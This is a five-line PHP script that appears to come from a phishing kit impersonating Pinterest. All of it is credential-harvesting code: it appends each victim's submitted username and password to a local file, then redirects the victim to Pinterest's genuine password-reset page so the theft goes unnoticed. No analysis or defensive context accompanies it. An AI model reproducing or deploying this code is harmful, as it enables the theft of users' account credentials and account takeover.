1<?php 2file_put_contents("../userpass/usernames.txt", "Pinterest Username: " . $_POST['id'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND); 3header('Location: https://www.pinterest.com/password/reset/'); 4exit(); 5?> 6